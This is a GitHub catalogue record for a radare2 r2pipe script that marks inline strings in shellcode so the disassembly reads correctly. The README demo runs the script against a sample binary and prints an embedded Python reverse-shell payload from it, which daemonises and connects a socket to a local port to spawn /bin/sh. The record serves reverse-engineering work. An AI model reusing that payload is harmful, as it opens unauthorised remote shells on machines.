{"id":16714041,"url":"https://github.com/therealdreg/call_trick_r2pipe","last_synced_at":"2026-01-02T12:33:27.826Z","repository":{"id":97023188,"uuid":"314521729","full_name":"therealdreg/call_trick_r2pipe","owner":"therealdreg","description":"radare2 script to fix disasm with call tricks for strings ","archived":false,"fork":false,"pushed_at":"2023-08-11T06:22:26.000Z","size":142,"stargazers_count":6,"open_issues_count":0,"forks_count":3,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-01-21T21:30:12.318Z","etag":null,"topics":["debugging","debugging-tool","r2pipe","radare2","reverse-engineering"],"latest_commit_sha":null,"homepage":"https://rootkit.es/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/therealdreg.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["therealdreg"],"patreon":"dreg","custom":["https://www.paypal.me/therealdreg","https://www.paypal.me/therealdreg"]}},"created_at":"2020-11-20T10:33:38.000Z","updated_at":"2023-07-26T07:28:17.000Z","dependencies_parsed_at":null,"dependency_job_id":"ec5245d8-9599-4749-80b9-ef9db461c377","html_url":"https://github.com/therealdreg/call_trick_r2pipe","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fcall_trick_r2pipe","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fcall_trick_r2pipe/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub
/repositories/therealdreg%2Fcall_trick_r2pipe/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fcall_trick_r2pipe/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/therealdreg","download_url":"https://codeload.github.com/therealdreg/call_trick_r2pipe/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243690893,"owners_count":20331869,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["debugging","debugging-tool","r2pipe","radare2","reverse-engineering"],"created_at":"2024-10-12T20:48:58.673Z","updated_at":"2026-01-02T12:33:27.778Z","avatar_url":"https://github.com/therealdreg.png","language":null,"funding_links":["https://github.com/sponsors/therealdreg","https://patreon.com/dreg","https://www.paypal.me/therealdreg"],"categories":[],"sub_categories":[],"readme":"Please consider making a donation: https://github.com/sponsors/therealdreg\n\n# call_trick_r2pipe\n\nAre you using radare for reversing or debugging shellcode/malware with a lot of call tricks for strings like these:\n\n```\ncall @f\ndb \"string1\",0\n@f:\nmore code\ncall @g\ndb \"string2\",0\n@g:\nmore code\n```\n\nTry this r2pipe (https://www.radare.org/n/r2pipe.html) script to fix the disassembly:\n```\n#!/usr/bin/env python3\n# run inside r2 session: #!pipe python3 poc.py\n\nimport r2pipe\n\nr2 = r2pipe.open()\nprint(r2.cmd(\"izz\"))\nfor e in r2.cmdj(\"izzj\"):\n       if e['type'] == \"ascii\" and e['section'] == \".text\":\n               # csa = f\"Csa {e['size']} @ { 
e['vaddr']}\"\n               csa = \"Csa \" + str(e['size']) + \" @\" + str(e['vaddr'])\n               print(csa)\n               r2.cmd(csa)\n```\n\nThis script searches for all C-style strings in the .text section and marks each one as a string.\n\nJust run this script with the \"#!pipe python3 poc.py\" command inside your r2 session:\n```\ndreg@fr33project:~# r2 64sudorevshell\n[0x00401000]\u003e #!pipe python3 poc.py\n[Strings]\nnth paddr      vaddr      len size section   type  string\n---------------------------------------------------------\n0   0x0000105a 0x0040105a 524 525  .text     ascii exec(\"\"\"\\nimport socket,subprocess,os,sys\\n\\npidrg = os.fork()\\nif pidrg \u003e 0:\\n        sys.exit(0)\\n\\nos.chdir(\"/\")\\n\\nos.setsid()\\n\\nos.umask(0)\\n\\ndrgpid = os.fork()\\nif drgpid \u003e 0:\\n        sys.exit(0)\\n\\nsys.stdout.flush()\\n\\nsys.stderr.flush()\\n\\nfdreg = open(\"/dev/null\", \"w\")\\n\\nsys.stdout = fdreg\\n\\nsys.stderr = fdreg\\n\\nsdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\n\\nsdregs.connect((str(0x7f000001),9999))\\n\\nos.dup2(sdregs.fileno(),0)\\n\\nos.dup2(sdregs.fileno(),1)\\n\\nos.dup2(sdregs.fileno(),2)\\n\\np=subprocess.call([\"/bin/sh\",\"-i\"])\\n\"\"\")\n1   0x00001274 0x00401274 11  12   .text     ascii /bin/python\n2   0x000012b7 0x004012b7 9   10   .text     ascii /bin/sudo\n3   0x00001479 0x00000001 18  19   .strtab   ascii 64sudorevshell.asm\n4   0x0000148c 0x00000014 6   7    .strtab   ascii parent\n5   0x00001493 0x0000001b 5   6    .strtab   ascii child\n6   0x00001499 0x00000021 4   5    .strtab   ascii arg3\n7   0x000014a2 0x0000002a 4   5    .strtab   ascii arg2\n8   0x000014ab 0x00000033 4   5    .strtab   ascii arg1\n9   0x000014b0 0x00000038 4   5    .strtab   ascii drgs\n10  0x000014b9 0x00000041 6   7    .strtab   ascii end_sc\n11  0x000014c0 0x00000048 11  12   .strtab   ascii __bss_start\n12  0x000014cc 0x00000054 6   7    .strtab   ascii _edata\n13  0x000014d3 0x0000005b 4   5    .strtab   ascii 
_end\n14  0x000014d9 0x00000001 7   8    .shstrtab ascii .symtab\n15  0x000014e1 0x00000009 7   8    .shstrtab ascii .strtab\n16  0x000014e9 0x00000011 9   10   .shstrtab ascii .shstrtab\n17  0x000014f3 0x0000001b 18  19   .shstrtab ascii .note.gnu.property\n18  0x00001506 0x0000002e 5   6    .shstrtab ascii .text\n\n\nCsa 525 @4198490\nCsa 12 @4199028\nCsa 10 @4199095\n[0x00401000]\u003e\n```\n\n# Before\n\n![alt text](before.png)\n\n# After\n\n![alt text](after.png)\n\nGreetz to Maijin for hints in #radare channel\n           \n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftherealdreg%2Fcall_trick_r2pipe","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftherealdreg%2Fcall_trick_r2pipe","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftherealdreg%2Fcall_trick_r2pipe/lists"}